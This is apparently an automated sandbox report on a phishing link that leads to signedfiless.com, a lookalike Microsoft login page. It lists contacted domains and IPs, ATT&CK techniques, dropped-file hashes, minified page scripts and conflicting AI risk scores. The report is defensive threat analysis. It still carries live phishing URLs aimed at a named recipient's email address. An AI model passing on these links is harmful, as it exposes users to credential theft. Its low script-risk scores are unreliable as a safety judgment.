              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Drive-by Compromise
              Windows Management Instrumentation1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://link.mail.beehiiv.com/ls/click?upn=u001.fl7hrKpqiw6rleMq0yETnMUZuFsAAwCeO-2BH5ERPYbcqsWCpxHbnR-2BAMni5gDH0KguWznuzJ8-2BPLnfO8gj2j9yQl2ivfAsJY4Ezg7DDw3zzKfSzxTK3e4dxMSvOfBS7t3jD7uyMdaZpLpYA-2FoIuXpkYxxl3nOzWBw62nOLKDtQmnHprAllAUT7JIYUOdWTCNc6huay-2BA-2FIfT2dnkFc6AmqA-3D-3DxUjQ_ALlq5-2F4R3mneNPhLNwp-2FSklL98Rffw61E2phJyJwq6p9ZGyzxGn1cEvL1cS-2FpYXg8QF3LQcVH6N3NvQgDELZv6iF7S8jW1KUDMp8-2BQMtNl9tkzcJNyX8lQ8goJivRSJ1rRDtRrMprAouHGu5blxfALgR7Dy3RcUTkIa9P9fzPowjq9zzgdGTCyOFs7uFwdqBdbRA0dgNynR-2B7yAoxS-2FBqGA-2F5DUOt7N3ksCGSpiDeOafLSSGRb3lCM-2FejLKZB1caBq-2BVS77p19cSK7ce7MMCKsUbNJM3WjT5y2hIW-2BU2KRnVsBRKjayQIu3Eoegvuf-2F4-2BO5eZgRdFML9H6U59SxyK76FhpMNa-2FGiv4uFwsBB2sysmbv0-2Frx-2BnQQJumR5LaNVWmqB2NU4epM800AHR8YJC4DZjZx1FvHMAKtZua35bl6MvjANzHsLEoDCNLFV06pC#bGFpbmkuc2NodWx0ekBnb2FhLm9yZw==0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              1e1f038a-c32a1353.signedfiless.com
              45.95.169.133
              truetrue
                unknown
                fe63ee9f-c32a1353.signedfiless.com
                45.95.169.133
                truetrue
                  unknown
                  acf7658e-c32a1353.signedfiless.com
                  45.95.169.133
                  truetrue
                    unknown
                    doxcs.signedfiless.com
                    45.95.169.133
                    truetrue
                      unknown
                      787bf5fe-c32a1353.signedfiless.com
                      45.95.169.133
                      truetrue
                        unknown
                        mwtelhasecologicas.com.br
                        128.201.75.108
                        truefalse
                          unknown
                          link.mail.beehiiv.com
                          104.18.68.40
                          truefalse
                            unknown
                            cc89e54c-c32a1353.signedfiless.com
                            45.95.169.133
                            truetrue
                              unknown
                              www.google.com
                              142.250.186.68
                              truefalse
                                unknown
                                1c91e9fc-c32a1353.signedfiless.com
                                45.95.169.133
                                truetrue
                                  unknown
                                  l1ve.signedfiless.com
                                  45.95.169.133
                                  truetrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=truetrue
                                      unknown
                                      https://1c91e9fc-c32a1353.signedfiless.com/Prefetch/Prefetch.aspxfalse
                                        unknown
                                        https://doxcs.signedfiless.com/?username=laini.schultz@goaa.orgtrue
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          142.250.186.68
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          142.250.186.78
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          128.201.75.108
                                          mwtelhasecologicas.com.brBrazil
                                          266618MEGAPROVEDOR-SERVICOSDEINTERNETLTDA-MEBRfalse
                                          172.217.16.138
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.238
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          45.95.169.133
                                          1e1f038a-c32a1353.signedfiless.comCroatia (LOCAL Name: Hrvatska)
                                          42864GIGANET-HUGigaNetInternetServiceProviderCoHUtrue
                                          142.250.185.131
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          64.233.184.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.18.68.40
                                          link.mail.beehiiv.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.217.16.195
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          IP
                                          192.168.2.16
                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1453063
                                          Start date and time:2024-06-06 16:13:04 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://link.mail.beehiiv.com/ls/click?upn=u001.fl7hrKpqiw6rleMq0yETnMUZuFsAAwCeO-2BH5ERPYbcqsWCpxHbnR-2BAMni5gDH0KguWznuzJ8-2BPLnfO8gj2j9yQl2ivfAsJY4Ezg7DDw3zzKfSzxTK3e4dxMSvOfBS7t3jD7uyMdaZpLpYA-2FoIuXpkYxxl3nOzWBw62nOLKDtQmnHprAllAUT7JIYUOdWTCNc6huay-2BA-2FIfT2dnkFc6AmqA-3D-3DxUjQ_ALlq5-2F4R3mneNPhLNwp-2FSklL98Rffw61E2phJyJwq6p9ZGyzxGn1cEvL1cS-2FpYXg8QF3LQcVH6N3NvQgDELZv6iF7S8jW1KUDMp8-2BQMtNl9tkzcJNyX8lQ8goJivRSJ1rRDtRrMprAouHGu5blxfALgR7Dy3RcUTkIa9P9fzPowjq9zzgdGTCyOFs7uFwdqBdbRA0dgNynR-2B7yAoxS-2FBqGA-2F5DUOt7N3ksCGSpiDeOafLSSGRb3lCM-2FejLKZB1caBq-2BVS77p19cSK7ce7MMCKsUbNJM3WjT5y2hIW-2BU2KRnVsBRKjayQIu3Eoegvuf-2F4-2BO5eZgRdFML9H6U59SxyK76FhpMNa-2FGiv4uFwsBB2sysmbv0-2Frx-2BnQQJumR5LaNVWmqB2NU4epM800AHR8YJC4DZjZx1FvHMAKtZua35bl6MvjANzHsLEoDCNLFV06pC#bGFpbmkuc2NodWx0ekBnb2FhLm9yZw==
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal84.phis.win@18/24@26/127
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 64.233.184.84, 172.217.16.195, 142.250.185.238, 34.104.35.123
                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: https://link.mail.beehiiv.com/ls/click?upn=u001.fl7hrKpqiw6rleMq0yETnMUZuFsAAwCeO-2BH5ERPYbcqsWCpxHbnR-2BAMni5gDH0KguWznuzJ8-2BPLnfO8gj2j9yQl2ivfAsJY4Ezg7DDw3zzKfSzxTK3e4dxMSvOfBS7t3jD7uyMdaZpLpYA-2FoIuXpkYxxl3nOzWBw62nOLKDtQmnHprAllAUT7JIYUOdWTCNc6huay-2BA-2FIfT2dnkFc6AmqA-3D-3DxUjQ_ALlq5-2F4R3mneNPhLNwp-2FSklL98Rffw61E2phJyJwq6p9ZGyzxGn1cEvL1cS-2FpYXg8QF3LQcVH6N3NvQgDELZv6iF7S8jW1KUDMp8-2BQMtNl9tkzcJNyX8lQ8goJivRSJ1rRDtRrMprAouHGu5blxfALgR7Dy3RcUTkIa9P9fzPowjq9zzgdGTCyOFs7uFwdqBdbRA0dgNynR-2B7yAoxS-2FBqGA-2F5DUOt7N3ksCGSpiDeOafLSSGRb3lCM-2FejLKZB1caBq-2BVS77p19cSK7ce7MMCKsUbNJM3WjT5y2hIW-2BU2KRnVsBRKjayQIu3Eoegvuf-2F4-2BO5eZgRdFML9H6U59SxyK76FhpMNa-2FGiv4uFwsBB2sysmbv0-2Frx-2BnQQJumR5LaNVWmqB2NU4epM800AHR8YJC4DZjZx1FvHMAKtZua35bl6MvjANzHsLEoDCNLFV06pC#bGFpbmkuc2NodWx0ekBnb2FhLm9yZw==
                                          InputOutput
                                          URL: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          {
                                          "riskscore": 2,
                                          "reasons": "The code defines several functions but does not contain any suspicious behavior such as redirecting to phishing sites, tracking users, or creating advertisements. However, it is worth noting that the code contains complex structures and uses of Promises and generators which could potentially hide malicious behavior. Therefore, a risk score of 2 is assigned."
                                          }
                                          )
                                          !function(){"use strict";var t=function(r,e){return t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,r){t.__proto__=r}||function(t,r){for(var e in r)Object.prototype.hasOwnProperty.call(r,e)&&(t[e]=r[e])},t(r,e)};function r(r,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function n(){this.constructor=r}t(r,e),r.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}function e(t,r,e,n){return new(e||(e=Promise))((function(o,i){function u(t){try{s(n.next(t))}catch(t){i(t)}}function c(t){try{s(n.throw(t))}catch(t){i(t)}}function s(t){var r;t.done?o(t.value):(r=t.value,r instanceof e?r:new e((function(t){t(r)}))).then(u,c)}s((n=n.apply(t,r||[])).next())}))}function n(t,r){var e,n,o,i,u={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:c(0),throw:c(1),return:c(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function c(c){return function(s){return function(c){if(e)throw new TypeError("Generator is already executing.");for(;i&&(i=0,c[0]&&(u=0)),u;)try{if(e=1,n&&(o=2&c[0]?n.return:c[0]?n.throw||((o=n.return)&&o.call(n),0):n.next)&&!(o=o.call(n,c[1])).done)return o;switch(n=0,o&&(c=[2&c[0],o.value]),c[0]){case 0:case 1:o=c;break;case 4:return u.label++,{value:c[1],done:!1};case 5:u.label++,n=c[1],c=[0];continue;case 7:c=u.ops.pop(),u.trys.pop();continue;default:if(!(o=u.trys,(o=o.length>0&&o[o.length-1])||6!==c[0]&&2!==c[0])){u=0;continue}if(3===c[0]&&(!o||c[1]>o[0]&&c[1]<o[3])){u.label=c[1];break}if(6===c[0]&&u.label<o[1]){u.label=o[1],o=c;break}if(o&&u.label<o[2]){u.label=o[2],u.ops.push(c);break}o[2]&&u.ops.pop(),u.trys.pop();continue}c=r.call(t,u)}catch(t){c=[6,t],n=0}finally{e=o=0}if(5&c[0])throw c[1];return{value:c[0]?c[1]:void 0,done:!0}}([c,s])}}}Object.create;function o(t){var r="function"==typeof Symbol&&Symbol.iterator,e=r&&t[r],n=0;if(e)return e.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&n>=t.length&&(t=void 0),{value:t&&t[n++],done:!t}}};throw new TypeError(r?"Object is not iterable.":"Symbol.iterator is not defined.")}function i(t,r){var e="function"==typeof Symbol&&t[Symbol.iterator];if(!e)return t;var n,o,i=e.call(t),u=[];try{for(;(void 0===r||r-- >0)&&!(n=i.next()).done;)u.push(n.value)}catch(t){o={error:t}}finally{try{n&&!n.done&&(e=i.return)&&e.call(i)}finally{if(o)throw o.error}}return u}function u(t,r,e){if(e||2===arguments.length)for(var n,o=0,i=r.length;o<i;o++)!n&&o in r||(n||(n=Array.prototype.slice.call(r,0,o)),n[o]=r[o]);return t.concat(n||Array.prototype.slice.call(r))}function c(t){return this instanceof c?(this.v=t,this):new c(t)}function s(t,r,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,o=e.apply(t,r||[]),i=[];return n={},u("next"),u("throw"),u("return"),n[Symbol.asyncIterator]=function(){return this},n;function u(t){o[t]&&(n[t]=function(r){return new Promise((function(e
                                          URL: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          ```json
                                          {
                                            "riskscore": 1,
                                            "reasons": "The code attempts to modify the top-level frame's location by appending a session ID. This could be a potential risk if the session ID is sensitive or user-specific. However, the impact is low since it is a common practice for tracking user activities and does not involve any suspicious redirections or phishing attempts."
                                          }
                                          //<![CDATA[
                                          !function(){var e=window,s=e.document,i=e.$Config||{};if(true){s&&s.body&&(s.body.style.display="block")}else if(false){var o,t,r,f,n,d;if(i.fAddTryCatchForIFrameRedirects){try{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}catch(e){}}else{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",
                                          o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}();
                                          //  
                                          URL: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          ```json
                                          {
                                            "riskscore": 1,
                                            "reasons": "The code creates an anonymous function that listens for 'error' and 'load' events on elements in the head of the document. While this in itself is not malicious, it is often used for loading resources from external sources (e.g. a CDN), which can introduce security risks if the external source is compromised. However, in this specific case, there is no evidence of phishing or other malicious intent, so the risk score is kept low."
                                          }
                                          //<![CDATA[
                                          !function(t,e){!function(){var n=e.getElementsByTagName("head")[0];n&&n.addEventListener&&(n.addEventListener("error",function(e){null!==e.target&&"cdn"===e.target.getAttribute("data-loader")&&t.$Loader.OnError(e.target)},!0),n.addEventListener("load",function(e){null!==e.target&&"cdn"===e.target.getAttribute("data-loader")&&t.$Loader.OnSuccess(e.target)},!0))}()}(window,document);
                                          //  
                                          URL: https://doxcs.signedfiless.com/?username=laini.schultz@goaa.org&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          {
                                          "riskscore": 5,
                                          "reasons": "The code contains obfuscated variable and function names, which can be indicative of malicious intent. However, it does not contain any obvious redirections, tracking, or advertisement-related behavior. The code also does not contain any long random hexadecimal strings. The risk score is therefore set to 5, indicating a moderate level of suspicion."
                                          }
                                          
                                          Explanation:
                                          
                                          While the code does not contain any overtly malicious behavior, the use of obfuscated variable and function names can make it difficult to determine its true purpose. This is a common technique used in malicious code to evade detection and analysis. However, the absence of other red flags such as redirections, tracking, and advertisements suggests that the code may not be highly malicious. The presence of long random hexadecimal strings is also not observed in this code. Therefore, a moderate level of suspicion is warranted.
                                          function a0Y(s,j){var i=a0S();return a0Y=function(u,S){u=u-0x1bb;var Y=i[u];return Y;},a0Y(s,j);}function a0S(){var Kw=['_finalizers','gusiC','_next','20246970oZKESw','ignoreCase','xWOWW','MessageChannel','sEqkm','remove','_socket','withoutSetter','qpHQv','zNXTr','pop','$(?!\x5cs)','deserializer','rejectionhandled','TypeError','Scheduled\x20action\x20threw\x20falsy\x20error','ObjectUnsubscribedError','closed','unsafe','XrBDp','dCQeY','ldgfY','sticky','emit','Bad\x20Promise\x20constructor','Xpixf','charCodeAt','_trimBuffer','mdEBD','bjVxF','EWuBc','RLeUH','clearImmediate','wmXDu','currentObservers','2092MiFaiE','\x20is\x20not\x20iterable','2971071LodsMF','defineProperties','java','delay','ruSsE','2087615NYUHvT','thrownError','Ihcfe','bYeqO','Reflect','\x20is\x20not\x20a\x20function','Event','operator','observable','You\x20provided\x20','Zxpdj','arpYi','push','pending','vpjvF','IS_ITERATOR','Promise-chain\x20cycle','closeObserver','create','concat','style','\x20where\x20a\x20stream\x20was\x20expected.\x20You\x20can\x20provide\x20an\x20Observable,\x20Promise,\x20ReadableStream,\x20Array,\x20AsyncIterable,\x20or\x20Iterable.','owuuP','31263710JxhIOc','_connectSocket','type','nonConfigurable','data','iAjce','rejection','lkhbC','symbol\x20detection','emARY','shift','wOzlK','hasOwnProperty','iframe','toStringTag','get\x20','TcqIQ','parse','script','ACEth','Deno','code','YrOoQ','iFRHm','host','geITD','finalize','hGQVl','complete','_resetState','setInterval','Function','9065696cqrZFT','url','oaiNg','String','4145418dHRypg','HynOW','getOwnPropertySymbols','Symbol(','aFdQf','number','[object\x20','clearInterval','\x20is\x20not\x20a\x20constructor\x20or\x20null','MutationObserver','SUBCLASSING','RGQPF','releaseLock','find','return\x20(function()\x20','asyncIterator','ySjfs','Symbol.','trys','fail','7nUzbcM','__core-js_shared__','htmlfile','YiIXL','eAOXr','xaYHZ','native-string-replace','Promise','$<a>c','addEventListener','5721VtkZMQ','isArray','enumerable','','normalize','initialTeardown','_parentage','getterFor','name','Can\x27t\x20set\x20','toString','_windowTime','SoVcJ','fPdsi','message','useDeprecatedSynchronousErrorHandling','status','chivx','','indexOf','something','xnfqV','open','6lsMuXk','setTimeout','nWzzx','domain','groups','OIBFU','importScripts','Array','aYemU','global','yKOIA','ZJNjG','_infiniteTimeWindow','erFOS','floor','kQWtV','aEnIb','Object\x20already\x20initialized','YYogK','_timestampProvider','Null','dotAll','LOwfh','QxGzX','flush','errorThrown','postMessage','getReader','forEach','done','value','symbol','_execute','keys','configurable','ZrrVO','42ketxFO','partialObserver','YPQle','input','NPmpb','ceil','createEvent','(((.+)+)+)+$','Iterable\x20cannot\x20be\x20null','onreadystatechange','facade','HgCJk','Unhandled\x20promise\x20rejection','join','DbozQ','OkZrR','ops','target','','set','reject','slice','all','TkEWm','splice','iVPuz','get','REJECTION_EVENT','JPCWa','rejectionHandled','npUCi','QgoXM','errors','UlFYw','ejwmt','vUziV','unic
                                          URL: https://doxcs.signedfiless.com Model: gpt-4o
                                          ```json
                                          {
                                            "phishing_score": 8,
                                            "brands": null,
                                            "phishing": true,
                                            "suspicious_domain": true,
                                            "has_loginform": false,
                                            "has_captcha": false,
                                            "setechniques": true,
                                            "legitmate_domain": "unknown",
                                            "reasons": "The domain name 'signedfiless.com' is suspicious and does not match any known legitimate brand. The URL structure and the domain name itself appear to be designed to mimic legitimate services, which is a common social engineering technique used in phishing attacks. Additionally, the webpage displayed in the image is very minimalistic and lacks any identifiable branding or content, which is often a characteristic of phishing sites."
                                          }
                                          URL: https://doxcs.signedfiless.com Model: phi3
                                          {  "primary_owner": "doxcs"}
                                          URL: https://doxcs.signedfiless.com Model: gpt-4o
                                          ```json
                                          {
                                            "phishing_score": 9,
                                            "brands": "Microsoft",
                                            "phishing": true,
                                            "suspicious_domain": true,
                                            "has_loginform": true,
                                            "has_captcha": false,
                                            "setechniques": true,
                                            "legitmate_domain": "microsoft.com",
                                            "reasons": "The URL 'doxcs.signedfiless.com' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The page contains a login form asking for a password, which is a common tactic used in phishing attacks. The domain name appears suspicious and unrelated to Microsoft, indicating a high likelihood of phishing."
                                          }
                                          URL: https://doxcs.signedfiless.com Model: phi3
                                          {"primary_owner": "microsoft"}
                                          URL: https://doxcs.signedfiless.com Model: gpt-4o
                                          ```json
                                          {
                                            "phishing_score": 9,
                                            "brands": "Microsoft",
                                            "phishing": true,
                                            "suspicious_domain": true,
                                            "has_loginform": true,
                                            "has_captcha": false,
                                            "setechniques": true,
                                            "legitmate_domain": "microsoft.com",
                                            "reasons": "The URL 'doxcs.signedfiless.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a login form on a suspicious domain is a common phishing technique. The domain name appears to be unrelated to Microsoft, which is a strong indicator of a phishing attempt."
                                          }
                                          URL: https://doxcs.signedfiless.com Model: phi3
                                          {"primary_owner": "microsoft"}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 6 13:13:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2673
                                          Entropy (8bit):3.994276936511089
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DEA371FEF86161E3C2DF9A8969438BE1
                                          SHA1:B92618A27D5D29E311C1342F330124B6014D8F94
                                          SHA-256:F95943F5516A464804011EC61B98CD25D6C382A094DF28000C8FDA645E37112A
                                          SHA-512:A83979D626F139636BDDF8257A9480177FABCF0565C22E1C1254F58CCBAB19E6A63F2EABC395CC7775B85A3206B3C6ACCC613E8FA05A82FF1F8B3CD670767FA0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....N.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 6 13:13:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2675
                                          Entropy (8bit):4.009858072338085
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A01DF2CE4FEAF8140AAACB1DFF6B161C
                                          SHA1:2CE7DC83C4FE71CC324F26B916C12C5258760127
                                          SHA-256:1B1848423B6597F1967928989E4D19E146982EED0B1E3C93ABE8B58AF990FEC0
                                          SHA-512:684F993E1301D25979866024AD9C0567C94F3B566E33BF8DF36BED7C6633621856B447EDB535EF431B4274B51B0F99520BD10B57759CF013CCA67BE44441D9AC
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....6......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2689
                                          Entropy (8bit):4.014506161771463
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E8D1EE406BF5AB2150301DC95FF85E5B
                                          SHA1:950B41868D9A84687357589187308318D8AB33C1
                                          SHA-256:E461CEBE1939C42552A1E16BE2E7D31F1AE0A21C7A9556AB6780A60EFC37D829
                                          SHA-512:3751C6A4E179FDB1FB953C60523FE93BC8828A63FAD913F9A89DA186ED61FEE3F63589CE4710672AF9EFE2132A1F36729D7FC3259D12B227B897574EB3B44AD2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 6 13:13:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):4.006897772239316
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FD2839902D03C135DD18CAE9FE066EE7
                                          SHA1:92F94E26521018ED17D651F46B6C43308CC93D35
                                          SHA-256:D5B6E7B4EC8CBF71F569DE7043A89AB744270F0728D5A40E5C130E1D9410BE19
                                          SHA-512:36DD5109834F47A9733BE0CEBE758FE45DDD8ADAAB4733E1BB04558A1F6EBDD6D14FA08048E811B7C279E5FC4E73E23B046E904780520834E4943532D5CCD7A9
                                          Malicious:false
                                          Reputation:unknown
